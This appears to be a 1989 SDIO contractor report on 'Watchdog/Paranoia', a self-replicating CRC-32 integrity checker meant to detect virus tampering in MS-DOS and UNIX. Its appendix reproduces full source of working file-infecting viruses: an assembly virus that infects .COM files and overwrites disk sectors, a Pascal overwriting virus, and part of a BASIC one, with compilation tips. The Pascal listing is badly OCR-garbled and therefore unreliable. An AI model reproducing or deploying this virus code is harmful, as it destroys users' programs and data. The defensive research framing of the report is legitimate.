A. TASK OBJECTIVES

The objectives of Task DI-MISC-80048, "Front-End Anti-Viral Detection Mechanism Using Replicating/Self-Replicating Software," are threefold:

1. Research viral mechanisms, anti-viral procedures, and self-replicating software mechanisms for use as security products in MS-DOS and UNIX environments on PCs and minis.

2. Evaluate the applicability of said mechanisms to protect and/or identify and/or detect computer virus intrusion and corruption within said systems.

3. Begin experimentation with a replicating/self-replicating software product to be used to secure SDIO operating systems, libraries, and archives.
B. TECHNICAL PROBLEMS

1. Bugs in AT&T UNIX System V Version 3 (HCL America Magnix): CSH supports job monitoring while KSH does not. The disassembler incorrectly disassembles an instruction. The wrong owner/group were assigned to some files by the system. RUNACCT, started from the CRON table, would get caught in an infinite loop on system startup. Using STTY 38400 would hang up the line even in single-user mode.

2. The use of a WORM program (a self-contained self-replicating software mechanism) for the Watchdog/Paranoia concept was not possible due to architectural limitations with regard to memory, memory addresses, and logical memory segments.

3. Prevention of viruses was ruled out due to the mathematical computations of Dr. Fred Cohen. He proved conclusively that it is impossible to protect against computer viruses.

4. Due to time and resource limitations, ACC, Inc. used a publicly known CRC-32 algorithm. In future, a less-public CRC algorithm will be used.

5. Watchdog/Paranoia slows down an MS-DOS-based PC appreciably, and a UNIX machine somewhat. Faster, optimized algorithms need to be researched.

6. Due to the impossibility of using existing appropriate technologies for detecting a well-written WORM or Trojan Horse program, these programs were omitted from the proof of concept. Future considerations will address these types of programs directly and separately.
C. GENERAL METHODOLOGY

ACC, Inc. used the following definitions in its research:

1. Computer Virus: A set of instructions, programmatic or otherwise, that propagate themselves through computer systems and/or networks, deliberately set to do things unwanted by the legitimate owners of those systems. A virus must attach itself to executable code in order to function.

2. WORM: A self-contained, free-running computer program which relocates in memory.

3. Trojan Horse: A program that does other than what it was intended to do.

4. Prevention: Stop the initial and subsequent attempts to infect a system. Not keyed to any particular infection.

5. Identification: Indicates specific infections.

6. Detection: Monitoring change to the characteristics of any executable component. Detection is not keyed to any particular infection.

Dr. Fred Cohen has proven mathematically that it is impossible to prevent a computer virus. Pamela Kane of Dr. Panda Systems has proven that it is impossible to know or identify all code that can make up a computer virus. And Steven J. Rose of Deloitte Haskins and Sells has stated, "The best protection would be to detect the presence of a virus before it could do harm." Therefore, ACC, Inc. chose to detect the modification of executable code by computer viruses, and our research followed that premise.

BBS Text: ACC, Inc. monitored hacker and public domain bulletin board services for information on computer viruses and how they function. A sample is included in Appendix A. This research provided us with a number of computer viruses for IBM, Commodore, and Apple PCs, and a WORM program for VAX/VMS in ADA. Especially informative was the VIRUS-L conference on BITNET.

Academic Research: Research includes academic papers (Fred Cohen, Ken Thompson, Gene Spafford, Ray Glatz, etc.), commercial magazine and newspaper articles, trade magazine articles, books, and professional-type hacker magazines. A short bibliography at the end of this report will show the types of sources used.

RE-APPLICATION OF PROVEN TECHNOLOGY

Self-replicatory technology research began in the 1960's as a game in Bell Laboratories called Core Wars. Opposing WORM programs would replicate themselves as quickly as possible, while overwriting their opponents. The program with the greatest number of copies was the winner. The WORM programs remained a game.

In the late 1970's and early 1980's, further research into self-replicatory mechanisms was performed at the Xerox Palo Alto Research Center. Most of this work is proprietary. Research tailed off as experimenters had difficulty finding applications for the self-replicatory mechanism.

The NCR 100 series system operating system utilized a functioning self-replicatory mechanism to automatically upgrade from early operating system versions to later ones. This use of a self-replicatory mechanism eliminated a thankless task for system administrators, as all storage devices brought on-line eventually upgraded themselves.

In the mid-1980's, Dr. Fred Cohen used a virus-oriented mechanism as a compression method to better utilize storage space. The virus, in pseudocode, is written like this:

    program compression-virus :=
    {01234567;

    subroutine infect-executable :=
        {loop: file = get-random-executable-file;
        if first-line-of-file = 01234567 then goto loop;
        compress file;
        prepend compression-virus to file;
        }

    main-program :=
        {if ask-permission then infect-executable;
        uncompress the-rest-of-this-file into tmpfile;
        run tmpfile;}
    }

(Computers and Security, Vol. 8, No. 4, June 1989, p. 326)

His concept, though it worked, proved slow. He is currently working on a similar mechanism for encryption of files.

In 1989, there were unconfirmed reports that the communications package for the PRODIGY bulletin board service would upgrade a user's package if he was using an earlier version. Frightening for the user, but a useful tool. Finally, hackers are exploring the possibilities of self-replicatory mechanisms. "One, whose handle is Bill McTuesday, says, 'They can clean up your computer and they can be used as a hacking tool. They provide a good way of investigating closed systems... They will also defend against invading viruses...'" (Mondo 2000, Fall #7, 1989, p. 50) Research into self-replicating software mechanisms has potential. ACC, Inc. chose to reapply this technology towards creating a tamper-proof, free-running security system with NO operator interface.

ACC, Inc. then performed a risks analysis of potential threats. Since it is impossible, using existing technologies, to detect a well-written WORM or Trojan Horse program, we concentrated on computer viruses and code corruption. WORM and Trojan Horse programs will be addressed in depth in Phase II. Since it is impossible to prevent a viral occurrence, whether through transferable storage media, remote access, or keyboard input, detection of corruption was deemed the most effective way to bound any potential damage caused by corruption. The research then moved to known virus code to study the attaching, executing, and replicatory mechanisms of these viruses. For security reasons, no code is included. Anyone who needs to see a sample may contact Mr. Richard Lenning at (205) 895-4170.

Lastly, ACC, Inc. began to program the Watchdog/Paranoia programs, our replicatory executable code security mechanism.




D. TECHNICAL RESULTS

WATCHDOG/PARANOIA

WATCHDOG is a replicatory software mechanism for protecting executable code in a computing system. PARANOIA is the code attached to the executable code within a computing system. WATCHDOG/PARANOIA validate the integrity of executable code and of themselves before allowing any program to execute. This self-running, replicating mechanism with its anti-tampering feature (self/cross validation) disallows operator interference with its functioning. It was successfully demonstrated on October 5, 1989, at the SDC, Huntsville, Alabama.


[Figure: WATCHDOG with a copy of PARANOIA (PAR) attached to each executable. Note the multiple copies of PARANOIA.]


WATCHDOG is the main program which scans all executable files within a system and validates whether or not PARANOIA is attached. If not, WATCHDOG will attach PARANOIA to the new code segments. PARANOIA is replicated by WATCHDOG to each executable code segment. WATCHDOG validates the integrity of PARANOIA and is, in turn, validated.

Validation is achieved through the use of an integrated CRC-32/Checksum calculated on a known good copy of the executable code. This value is stored with PARANOIA attached to the executable code. Every time the code segments (shell script/library) or programs are to be executed, PARANOIA recalculates the CRC-32/Checksum and compares it with the original value. If the validation is true, it allows the execution of the program segment. If the validation is false, PARANOIA sends E-Mail on-site and off-site to warn of possible corruption/infection. WATCHDOG/PARANOIA can also be programmed to lock up the system, or to disallow execution of the offending program segment while allowing validated program segments to continue processing.

The anti-tampering mechanism depends upon a communications protocol between WATCHDOG and PARANOIA. Each time PARANOIA is executed, it queries WATCHDOG to validate that WATCHDOG is functioning. If WATCHDOG is functional, PARANOIA continues. If WATCHDOG is non-functional in any way, PARANOIA will send E-Mail, both on- and off-site, and prevent the execution of the program segment. The same result occurs if PARANOIA fails its validation by WATCHDOG. Future consideration will include a back-up table of CRC/Checksum values within WATCHDOG.

For security reasons, the source and object code for Watchdog/Paranoia have not been included. If such code is necessary to an evaluation, please contact Mr. Richard Lenning, SDIO/SDC at 205-895-4170.
[Figure: WATCHDOG flowchart. Blocks: Start, Communications, Scanner.]

A  BASIC  DESCRIPTION  OF  WATCHDOG/PARANOIA 


COMMON MODULE BREAKDOWN IN DOS/UNIX

crc.h
    header file for crc.c
    defines:
        generatetable()
            this initializes the table used by generatecrc32
        generatecrc32(FILE *)
            this calculates and returns the negated CRC-32 value for the open file passed in.

crc.c
    contains the code for the above functions.

UNIX MODULE BREAKDOWN

crcset (name)
    this calculates the CRC-32 value for <name>. If it is not correct, it calculates the correct value and appends it to the executable file.

crctest (name)
    this calculates the CRC-32 value for <name>. If it is correct, it returns 1, else it returns 0.

ldtest.tst
    temporary file generated by makepara and used by the system program 'ld' to generate the new program.

mail.h
    defines:
        mail(to, text)
            sends 'text' to 'to' using the system program mailx.

mail.c
    contains the code for mail.

makepara (name)
    this program uses crc.c and mail.c to modify executable files:
        reads in the header from <name>
        checks the CRC-32 value, exits if ok
        sends mail saying that it is correcting the file
        creates ldtest.tst
        runs the system program 'ld'
        calculates the new CRC-32 value and appends it to the executable file

para.c
    this is the 'header' file prepended to every executable file:
        verifies that the CRC-32 value at the end of the file is correct; if not, it sends mail and exits
        sees if watchdog is listening by doing the following:
            * attempts to get the semaphore used by watchdog
            * sends mail and exits if it cannot
            * attempts to increment the semaphore
            * attempts to decrement the semaphore by 2
            if it could not, it prints a message and exits
        now it executes the attached program

semhead.h
    include file used by the sem... programs

semclr
    creates the semaphore and sets it to 0

seminc
    increments the semaphore

semset
    sets the semaphore to 10

semtest
    standalone test program

semwait
    waits until the semaphore is incremented

t1.c
    simple test program

t2.c
    simple test program

virstart.s
    modified assembly language start-up code for 'c' that continues execution of the main program after the header completes

watch.c
    first attempt to write watch

watch.sh
    this shell script contains 2 infinite loops that are forked:
        fork 1
            repeatedly executes 'find' to find all files that are executable and executes makepara on each such file
        fork 2
            executes semclr to initialize the semaphore, then repeatedly executes
                semwait
                seminc
MS-DOS MODULE BREAKDOWN

c0.asm
    these are versions of the Borland start-up code (tiny model) modified to make any program a potential virus.

makepara (name)
    this program uses crc.c to modify executable files:
        reads in the header from <name>
        checks for a virus header, exits if ok
        adds the virus header
        modifies the executable header to jump to para.bin first
        adds para.bin to the end of the executable file
        calculates the new CRC-32 value and appends it to the executable file

test3.c, .exe
    this is the program the tests are run on.

watch.h
    this is the header file containing the description of the watchdog header

test2.c, .exe, .bin (paranoia)
    this is the exe-resident code:
        * it verifies the checksum,
        * it verifies that watchdog is active,
        * it executes the normal program code.

watch.c, .exe
    this is the memory-resident code that verifies that no writes are done to any .exe files; if any are attempted, it first prompts the user for verification. It also installs paranoia on any files that are executed.
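As an added example, not ACC, Inc.'s crc.c, crcset, crctest or PARANOIA code, the following C program shows the validation described above: a CRC-32 computed over a known-good image, stored as a trailer on the executable, and recomputed and compared before the program is allowed to run. It assumes the report's "negated CRC-32" is the standard reflected CRC-32 (polynomial 0xEDB88320, initial value 0xFFFFFFFF, final complement), that the trailer is 4 little-endian bytes appended after the image, and works on in-memory buffers instead of the open FILE * used by generatecrc32; the image bytes are constructed for the demo.

```c
/* Added example (not ACC, Inc.'s code): CRC-32 trailer check in the style of
 * crcset/crctest and the PARANOIA gate.  Assumptions: "negated CRC-32" means
 * the standard reflected CRC-32 (poly 0xEDB88320, init 0xFFFFFFFF, final
 * complement); the trailer is 4 little-endian bytes after the image; images
 * are in-memory buffers instead of the open FILE * used by generatecrc32. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TRAILER_LEN 4

static uint32_t crc_table[256];
static int table_ready = 0;

/* generatetable(): build the byte-wise lookup table once (crc.h's role). */
static void generatetable(void)
{
    for (uint32_t n = 0; n < 256; n++) {
        uint32_t c = n;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (0xEDB88320u ^ (c >> 1)) : (c >> 1);
        crc_table[n] = c;
    }
    table_ready = 1;
}

/* crc32_buf(): CRC-32 of an image; the final XOR gives the "negated" value. */
uint32_t crc32_buf(const unsigned char *data, size_t len)
{
    if (!table_ready)
        generatetable();
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++)
        c = crc_table[(c ^ data[i]) & 0xFFu] ^ (c >> 8);
    return c ^ 0xFFFFFFFFu;
}

/* crctest(): 1 if the trailing CRC-32 matches everything before it, else 0.
 * An image too short to carry a trailer is never valid. */
int crctest(const unsigned char *image, size_t len)
{
    if (len < TRAILER_LEN)
        return 0;
    size_t body = len - TRAILER_LEN;
    uint32_t stored = (uint32_t)image[body]
                    | (uint32_t)image[body + 1] << 8
                    | (uint32_t)image[body + 2] << 16
                    | (uint32_t)image[body + 3] << 24;
    return crc32_buf(image, body) == stored;
}

/* crcset(): install a trailer on an unprotected image (caller leaves
 * TRAILER_LEN spare bytes).  Returns the new length, or len unchanged if a
 * valid trailer is already present.  Like the report's crcset this cannot
 * tell "never protected" from "protected, then corrupted", which is why
 * makepara mails a warning before it corrects a file. */
size_t crcset(unsigned char *image, size_t len)
{
    if (crctest(image, len))
        return len;
    uint32_t c = crc32_buf(image, len);
    image[len + 0] = (unsigned char)(c & 0xFFu);
    image[len + 1] = (unsigned char)((c >> 8) & 0xFFu);
    image[len + 2] = (unsigned char)((c >> 16) & 0xFFu);
    image[len + 3] = (unsigned char)((c >> 24) & 0xFFu);
    return len + TRAILER_LEN;
}

/* paranoia_gate(): PARANOIA's decision before running the attached program.
 * 1 = execute; 0 = refuse (the real header also sends on-/off-site mail).
 * watchdog_alive stands in for the semaphore handshake with WATCHDOG. */
int paranoia_gate(const unsigned char *image, size_t len, int watchdog_alive)
{
    if (!crctest(image, len))
        return 0;           /* CRC mismatch: possible corruption/infection */
    if (!watchdog_alive)
        return 0;           /* WATCHDOG not functioning: refuse to run */
    return 1;
}

int main(void)
{
    /* Constructed stand-in for an executable image, with room for a trailer. */
    unsigned char image[64] = "MZ-demo-executable";
    size_t len = strlen((char *)image);

    len = crcset(image, len);                          /* makepara installs the CRC */
    printf("crc ok after crcset : %d\n", crctest(image, len));            /* 1 */
    printf("gate, watchdog alive: %d\n", paranoia_gate(image, len, 1));   /* 1 */
    printf("gate, watchdog dead : %d\n", paranoia_gate(image, len, 0));   /* 0 */

    image[5] ^= 0x01;                                  /* one flipped bit in the body */
    printf("gate after tamper   : %d\n", paranoia_gate(image, len, 1));   /* 0 */
    /* CRC-32 is public and linear: it catches accidental or naive changes,
     * not an adversary who recomputes the trailer (technical problem 4 above). */
    return 0;
}
```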
E. IMPORTANT FINDINGS AND CONCLUSIONS

1. Self-Secure Security Mechanism: A non-operator-interruptable self-replicatory software program with an anti-tampering mechanism holds great promise as a mechanism for computing system security. The benefits are threefold:

    a. Once installed, the program cannot be disabled without a full system shutdown.

    b. The program logic enforces a predefined level of security regardless of the laxness of security inherent in human-operated and installed security.

    c. There is no operator interface with the program.

2. Detection: Detection of viruses and corruption is the only way to ensure that an affected system will be recovered in the shortest amount of time.

3. Bounding the Damage: This is the detection and isolation of corruption/intrusion, such that all affected systems are isolated from non-affected systems. Backup systems will be brought on-line to continue the processing of a network or group of networks. Future considerations will allow for isolation of affected programs, thus allowing a system to continue processing valid programs.

4. Ease of Modification: Even with inherent operating system security measures in place, it was quite simple to modify executable code and files under MS-DOS and UNIX.

5. Portability: The WATCHDOG/PARANOIA concept is easily ported to other operating systems and architectures.
F. IMPLICATIONS FOR FURTHER RESEARCH

1. Continuation of UNIX Effort for AT&T System V, Version 3

    a. Monitor process activity.

        1. Log of process activity

        2. Investigate suspicious activity

    b. Add code to protect shell scripts, archives, and libraries from corruption.

    c. Research into management concerns which affect systems administrators. Enforcement of available operating system security.

    d. Secure log of activity.

    e. Add passwords and message authentication codes to modify mail destinations.

    f. Audit trail of operational states for recovery in a protected mode.

    g. Develop a shutdown to a special state with only designated security officer override if any operator interface is necessary.

    h. Define requirements for a test utilizing a multi-user facility (NTF and eventually NTB).

        NTF = Small test facility
        NTB = Full SDI computer network

    i. Investigate the use of shared libraries for AT&T 5.3 for more efficient functioning of the WATCHDOG/PARANOIA concept.

    j. Study methods to increase product functional speed at minimum increase in overhead.

    k. Eliminate existing points of vulnerability (linker, archiver, assembler, debugger, etc.).

    l. WATCHDOG/PARANOIA programmed override implementation/enforcement of OS security at maximum level.

    m. Develop a method by which WATCHDOG/PARANOIA does not impede real-time executables.

    n. Lockout of access to WATCHDOG/PARANOIA code and any transfer which would reduce WATCHDOG/PARANOIA security.

    o. Research CRCs and checksums and combinations thereof to optimize security.

    p. Develop a tighter anti-tampering mechanism with warning of anomalies.

2. Expansion of the Product to Multi-User Minicomputer/Mainframe Networked Systems

    a. Assure compatibility of function where other security systems are installed (i.e., TOP SECRET, RACF).

    b. Explore PROM/firmware board for self-installation. This affects every machine/OS uniquely.

    c. Study the effect of parallel processing and the relations thereby produced.

    d. Develop a process activity scanner

        1. Unusual activity

        2. Event-driven

    e. Develop a functioning message authorization code (ID every block)

        1. External

        2. Internal

    f. Port to real-time ADA.

    g. Implement an option for system backup.
G. SIGNIFICANT HARDWARE DEVELOPMENT

Not applicable. The Watchdog/Paranoia concept functions on commercially available architectures.
APPENDIX A

Viruses: Assembly, Pascal, Basic & Batch

[ACC, Inc. does not assume responsibility for any damages that may occur when compiling viruses depicted in this explanation. This Appendix has been written to promote knowledge of the amazing universe of computer viruses.]

Viruses can be written in practically every computer language known today, although most effective viruses have been written in Assembly Language.

Many uninitiated in the methods of the telecommunications hobbyist think that viruses cannot be written in Basic due to its limited command universe. This is untrue. Basic has the capability of producing very effective viruses if the command set is properly used. Combining assembly and Basic could further enhance the effectiveness of a virus.

In this Appendix we will examine some viruses written in Assembly Language, Pascal, Basic and Batch, written by B. Fix, R. Burger and M. Vallen (members of the Swiss Crackers Association), which proved to be very interesting to the Phase 1 effort.

Please use extreme caution when assembling these virus programs. Copy the result to a separate disk when you compile.

Virus in Assembly Language

Most viruses have been written in assembly language because it has the unique ability to bypass operating system security. Here is an example of a virus written under MS-DOS 2.1 which can be compiled in the later versions. ACC, Inc. has included remarks so as to further explain the parts which comprise the total code development. Programmers may wish to delete those segments if desired.


; Program Virus
; Version 1.1
; Writer  : R. Burger
; Created 1986
;
; This is a demonstration program for computer
; viruses. It has the ability to replace itself,
; and thereby modify other programs. Enjoy.

Code    Segment
        Assume  CS:Code
progr   equ     100h
        ORG     progr

;**************************************************
; The three NOP's serve as the marker byte of the
; virus which allow it to identify a virus.
;**************************************************

MAIN:
        nop
        nop
        nop

;**************************************************
; Initialize the pointers
;**************************************************
        mov     ax,00
        mov     es:[pointer],ax
        mov     es:[counter],ax
        mov     es:[disks],al

;**************************************************
; Get the selected drive
;**************************************************
        mov     ah,19h              ;drive?
        int     21h

;**************************************************
; Get the current path on the current drive
;**************************************************
        mov     cs:drive,al         ;save drive
        mov     ah,47h              ;dir?
        mov     dh,0
        add     al,1
        mov     dl,al               ;in actual drive
        lea     si,cs:old_path
        int     21h

;**************************************************
; Get the number of drives present. If only one
; is present, the pointer for the search order
; will be set to search order + 6
;**************************************************
        mov     ah,0eh              ;how many disks
        mov     dl,0
        int     21h
        mov     al,01
        cmp     al,01               ;one drive
        jnz     hups3
        mov     al,06
hups3:  mov     ah,0
        lea     bx,search_order
        add     bx,ax
        add     bx,0001h
        mov     cs:pointer,bx
        clc

;**************************************************
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM files and infected.
; This causes the error message "Program too large
; to fit memory" when starting larger infected
; EXE programs.
;**************************************************
change_disk:
        jnc     no_name_change
        mov     ah,17h              ;change .EXE to .COM
        lea     dx,cs:maske_exe
        int     21h
        cmp     al,0ffh             ;.EXE found?
        jnz     no_name_change

;**************************************************
; If neither .COM nor .EXE is found then sectors
; will be overwritten depending on the system time
; in milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can
; find nothing more to infect and starts its destruction
;**************************************************
        mov     ah,2ch              ;read system clock
        int     21h
        mov     bx,cs:pointer
        mov     al,cs:[bx]
        mov     bx,dx
        mov     cx,2
        mov     dh,0
        int     26h                 ;write crap on disk
;**************************************************
; Check if the end of the search order table has been
; reached. If so, end.
;**************************************************
no_name_change:
        mov     bx,cs:pointer
        dec     bx
        mov     cs:pointer,bx
        mov     dl,cs:[bx]
        cmp     dl,0ffh
        jnz     hups2
        jmp     hops

;**************************************************
; Get new drive from the search order table and
; select it
;**************************************************
hups2:
        mov     ah,0eh
        int     21h                 ;change disk

;**************************************************
; Start in the root directory
;**************************************************
        mov     ah,3bh              ;change path
        lea     dx,path
        int     21h
        jmp     find_first_file

;**************************************************
; Starting from the root, search for the first
; subdir. First convert all .EXE files to .COM
; in the old directory
;**************************************************
find_first_subdir:
        mov     ah,17h              ;change .exe to .com
        lea     dx,cs:maske_exe
        int     21h
        mov     ah,3bh              ;use root directory
        lea     dx,path
        int     21h
        mov     ah,04eh             ;search for first subdirectory
        mov     cx,00010001b
        lea     dx,maske_dir        ;dir mask
        int     21h
        jc      change_disk
        mov     bx,cs:counter
        inc     bx
        dec     bx
        jz      use_next_subdir

;**************************************************
; Search for the next subdirectory. If no more
; directories are found, the drive will be changed.
;**************************************************
find_next_subdir:
        mov     ah,4fh              ;search for next subdir
        int     21h
        jc      change_disk
        dec     bx
        jnz     find_next_subdir

;**************************************************
; Select found directory.
;**************************************************
use_next_subdir:
        mov     ah,2fh              ;get dta address
        int     21h
        add     bx,1ch
        mov     es:[bx],'\'         ;address of name in dta
        inc     bx
        push    ds
        mov     ax,es
        mov     ds,ax
        mov     dx,bx
        mov     ah,3bh              ;change path
        int     21h
        pop     ds
        mov     bx,cs:counter
        inc     bx
        mov     cs:counter,bx

;**************************************************
; Find first .COM file in the current directory.
; If there are none, search the next directory.
;**************************************************
find_first_file:
        mov     ah,04eh             ;Search for first
        mov     cx,00000001b        ;mask
        lea     dx,maske_com
        int     21h
        jc      find_first_subdir
        jmp     check_if_ill
;**************************************************
; If program is ill (infected), then search for
; another one.
;**************************************************
find_next_file:
        mov     ah,4fh              ;search for next
        int     21h
        jc      find_first_subdir

;**************************************************
; Check if already infected by virus.
;**************************************************
check_if_ill:
        mov     ah,3dh              ;open channel
        mov     al,02h              ;read/write
        mov     dx,9eh              ;address of name in dta
        int     21h
        mov     bx,ax               ;save channel
        mov     ah,3fh              ;read file
        mov     ch,buflen
        mov     dx,buffer           ;write in buffer
        int     21h
        mov     ah,3eh              ;close file
        int     21h

        mov     ah,43h              ;write enable
        mov     al,0
        mov     dx,9eh              ;address of name in dta
        int     21h
        mov     ah,43h
        mov     al,01h
        and     cx,11111110b
        int     21h
;**************************************************
; Open file for read/write access.
;**************************************************
        mov     ah,3dh              ;open channel
        mov     al,02h              ;read/write
        mov     dx,9eh              ;address of name in dta
        int     21h

;**************************************************
; Read date entry of program and save for future
; use.
;**************************************************
        mov     bx,ax               ;channel
        mov     ah,57h              ;get date
        mov     al,0
        int     21h
        push    cx                  ;save date
        push    dx

;**************************************************
; The jump located at address 0100h of the program
; will be saved for further use.
;**************************************************
        mov     dx,cs:[conta]       ;save old jmp
        mov     cs:[jmpbuf],dx
        mov     dx,cs:[buffer+1]    ;save new jump
        lea     cx,cont-100h
        sub     dx,cx
        mov     cs:[conta],dx

;**************************************************
; The virus copies itself to the start of the file.
;**************************************************
        mov     ah,57h              ;write date
        mov     al,1
        pop     dx
        pop     cx                  ;restore date
        int     21h

;**************************************************
; Close the file.
;**************************************************
        mov     ah,3eh              ;close file
        int     21h
;**************************************************
; Restore the old jump address. The virus saves at
; address "conta" the jump which was at the start of
; the host program.
; This is done to preserve the executability of the
; host program as much as possible.
; After saving it still works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory.
;**************************************************
        mov     dx,cs:[jmpbuf]      ;restore old jump
        mov     cs:[conta],dx
hops:   nop
        call    use_old

;**************************************************
; Continue with the host program.
;**************************************************
cont    db      0e9h                ;make jump
conta   dw      0
        mov     ah,00
        int     21h

;**************************************************
; Reactivate the selected drive at the start of
; the program.
;**************************************************
use_old:
        mov     ah,0eh              ;use old drive
        mov     dl,cs:drive
        int     21h

;**************************************************
; Reactivate the selected path at the start of
; the program.
;**************************************************
        mov     ah,3bh              ;use old drive
        lea     dx,old_path-1       ;get old path and backslash
        int     21h
        ret

search_order    db      0ffh,1,0,2,3,0ffh,00,0ffh
pointer         dw      0000                ;pointer f. search order
counter         dw      0000                ;counter f. nth. search
disks           db      0                   ;number of disks
maske_com       db      "*.com",00          ;search for com files
maske_dir       db      ,00                 ;search for dir's
maske_exe       db      0ffh,0,0,0,0,0,00111111b
                db      0,"????????exe",0,0,0,0
                db      0,"????????com",0
maske_all       db      0ffh,0,0,0,0,0,00111111b
                db      0,"???????????",0,0,0,0
                db      0,"????????com",0

buffer          equ     0e00h               ;a safe place
buflen          equ     230h                ;length of virus!!!!
                                            ;careful
                                            ;if changing!!!!
jmpbuf          equ     buffer+buflen       ;a safe place for jmp
path            db      "\",0               ;first place
drive           db      0                   ;actual drive
back_slash      db      "\"
old_path        db      32 dup (?)          ;old path

code    ends
        end     main

[END  OF  THIS  VIRUS  PROGRAM] 


Virus in Pascal

Pascal is another high-level language that can produce eye-popping computer viruses, especially when the usage of Turbo Pascal is involved. The virus below was available through various bulletin boards for a while.


( 


Number  One 


Please  handle  this  virus  with  care!!!!!!!!!!!  [Deadly  Demo] 

Number  One  infects  all  .COM  file's  (name  will  be  displayed). 
That  file  has  been  overwritten  with  Number  Ones ' s  program  code 
and  is  not  reconstructible !  If  all  files  are  infected  or  no 
•COM  files  are  found,  Number  one  gives  you  a  <Smile>. 

Files  may  be  protected  against  infections  of  Number  One  by 
setting  the  Read  ONLY  attribute. 
Written  10.3.87  by  M.Vallen  (Turbo  Pascal  3.01A) 


> 


3 

(C-) 

Cu-O 

^1-3  '  Wont  allow  a  user  break,  enable  10  checke 

^  --  Constants  - 


Const 

Virus  Size  =  12027;  ^Number  One's  code  size} 

Warning  : String! 42]  ^Warning  message) 

=  'This  file  has  been  infected  ny  Number  One! 1 ; 

(  --  Type  declarations - 3 

Type 

DTARec  ^Record  £Data  area  for  file  search  ) 

DOSnext  : Array [ 1 .. 21 ]  of  Byte; 

Attr  :  Byte; 

Ftime , 

FDate , 

FLsize , 

FHsize  :  Integer; 

FullName:  Array[1..13]  of  Char; 

End ; 

Registers  =  Record  {^Register  set  used  for  file  search  13 
Case  Byte  of 

1  :  (AX,BX,CX,DX,BP,SI,DI,DS,ES, Flags  :  Integer); 

2  :  ( AL, AH , BL , BH , CL , CH , DL , DH  :  Byte); 

End ; 


£  --  Variables 
Var 


ProgramStart 

Marklnf ected 
:  Registers; 

DTA 

Buffer 

TestID 

UsePath 


C  Memory  offset  program  code  ) 
Byt<=“  absolute  Cseg:$100; 

C  Infected  marker  ) 
String! 42]  absolute  Cseg:$180;  Reg 
4  Register  set  ) 

DTARec;  <4  Data  area  3 

Array[Byte]  of  Byte;  C  Data  buffer  3 

String[42];  £_ To  recognize  infected  files  > 
String[66];  C  Path  to  search  files  J 

4  Length  of  search  path  3 


File  to  infect  2> 
Used  ■> 

- ) 


UsePathLenght :  Byte  absolute  UsePath; 

Go  :  File; 

B  :  Byte; 

C  —  Program  code - 

Begin 

WriteLn( Warning ) ;  £  Display  warning  message 

GetDir(0,  UsePath);  ^  get  current  directory  ^ 

if  Pos('N',  UsePath)  UsePathLenght  then 
UsePath  :=  UsePath  +  'N'; 

UsePath  :=  UsePath  +  '*.COM';  £  Define  search  mask 

Reg. AH  :=  $1A;  £  Set  data  area 

Reg.DS  :=  Seg(DTA); 

Reg.DX  :=  Of s{ DTA) ; 

MsDos ( Reg ) ; 

UsePath[ Succ ( UsePathLenght )] :=#0 ;  £  Path  must  end  with  #0 
Reg. AH  :=  $4E; 

Reg.DS  :=  Seg( UsePath ) ; 

Reg.DX  :=  Of s { UsePath [ 1 ] ) ; 

Reg  CX  :=  $ff;  £  Set  attribute  to  find  ALL  files  y 

MsDos(Reg);  £  Find  first  matching  entry 

IF  not  Odd(Reg .Flags )  Then  £  If  a  file  found  then  'J 

Repeat 

UsePath  :=  DTA . FullName ; 

B  :=  Pos ( #0 ,  UsePath) ; 

If  B  >  0  then 

Delete  (  UsePath  ,  B,  255);  Remove  garbage 

Assign(Go,  UsePath); 

Reset ( Go ) ; 

If  IOresult  =  0  Then  £  If  not  10  error  then 

Begin 

BlockRead ( Go ,  Buffer,  2); 

Move( Buffer [ $80 ] ,  TestID,  43); 

•£,  Test  if  file  already  ill  ( Inf  ected ) 

If  TestID  <>  Warning  Then  £  If  not  then  ...  ^5 

Begin 

Seek  ( Go ,  0 ) ; 

C  Mark  file  as  infected  and  , .  y 
Marklnfected  :=  Warning; 

C  Infect  it  y 

BlockWrite ( Go , ProgramStart , Succ ( VirusSize  shr  7); 
Close ( Go ) ; 

C.  Say  what  has  been  done  y 
WriteLn( UsePath  +  'infected.'); 

Halt;  £. .  and  halt  the  program  y 

End  ; 

Close ( Go ) ; 

End;  £  The  file  has  already  been  infected,  search 

next .  1) 

Reg. AH  :=  $4F; 
Reg.DS  :=  Seg(DTA); 

Reg.DX  :=  Ofs(DTA) ; 

MsDos(Reg); 

£  . Until  no  more  files  are  found 

Until  Odd ( Red . Flags )  ; 

Write(  '(Smiley  )  ;  (^Give  a  smile 

End. 


Although this is a primitive virus, it is effective. This virus 
infects only .COM files. It is about 12K and it will change the 
file's date entry. 


Virus in Basic 


Basic is a reasonably easy-to-comprehend instructional computer 
language. People often think of it as limited and of no use in 
creating a virus. What follows proves the doubters wrong. Let's 
take a look at a Basic virus created by R. Burger in 1987. This 
program is an overwriting virus. It uses the MS-DOS SHELL 
command to infect .EXE files. To do this you must compile the 
source code with Microsoft QuickBASIC. Note the length of the 
compiled program and the length of the linked .EXE file, and 
edit the source code to place the length of the linked program 
in the LENGHTVIR variable. BV3.EXE should be in the current 
directory, COMMAND.COM must be available, and the LENGHTVIR 
variable must be set to the length of the linked program. 
Remember to use the /e parameter when compiling. 

10  REM  **  DEMO 

20  REM  **  MODIFY  IT  YOUR  OWN  WAY  IF  DESIRED  ** 

30  REM  **  BASIC  DOESNT  SUCK 

40  REM  **  NO  KIDDING 

50  ON  ERROR  GOTO  670 

60  REM  ***  LENGHTVIR  MUST  BE  SET  ** 

70  REM  ***  TO  THE  LENGHT  TO  THE  ** 

80  REM  ***  LINKED  PROGRAM  *** 

90  LENGHTVIR=2641 
100  VIRR00T$="BV3 . EXE" 

110  REM  ***  WRITE  THE  DIRECTORY  IN  THE  FILE  "INH" 

130  SHELL  "DIR  *.  EXE,;  INH" 

140  REM  **  OPEN  "INH"  FILE  AND  READ  NAMES  ** 

150  OPEN  "R" ,1, "INH" ,32000 
160  GET  #1,1 

170  LINE  INPUT# 1 , ORIGINALS 
180  LINE  INPUT# 1 , ORIGINALS 
190  LINE  INPUT# 1 , ORIGINALS 
200  LINE  INPUT# 1, ORIGINAL$ 

210  ON  ERROR  GOT  670 
220  CLOSE# 2 

